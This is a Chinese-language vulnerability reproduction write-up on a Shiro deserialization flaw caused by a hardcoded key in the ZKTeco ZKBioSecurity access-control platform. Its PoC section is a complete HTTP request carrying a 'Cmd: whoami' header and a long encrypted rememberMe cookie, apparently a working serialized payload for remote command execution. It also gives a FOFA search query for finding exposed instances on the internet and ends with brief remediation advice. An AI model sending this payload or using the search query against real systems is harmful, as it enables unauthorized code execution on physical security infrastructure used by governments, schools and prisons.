Zkteco百傲瑞达安防管理系统平台 Shiro反序列化漏洞复现

0x01 产品简介

  百傲瑞达是基于生物识别技术打造的一站式安防软件服务平台，平台涵盖人事管理、门禁管理、梯控管理、访客管理、视频联动、系统设置等模块，门禁配合通道管理设备可实现对出入口进行控制，可以深度应用于政府、企业、监狱、学校、智慧社区等多个安防需求领域

0x02 漏洞概述

 Zkteco 百傲瑞达安防管理系统平台存在 shiro 反序列化漏洞，该漏洞源于软件存在硬编码的 shiro-key，攻击者可利用该 key 生成恶意的序列化数据，在服务器上执行任意代码，执行系统命令、或打入内存马等，获取服务器权限。

0x03 复现环境

FOFA：title=="ZKBioSecurity" && body="Automatic login within two weeks"  

0x04 漏洞复现

PoC

GET / HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cmd: whoami
Cookie: rememberMe=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
Accept-Encoding: gzip

0x05 修复建议

官方暂已修复该漏洞，请用户联系厂商修复漏洞：https://www.zkteco.com

通过防火墙等安全设备设置访问策略，设置白名单访问。

如非必要，禁止公网访问该系统。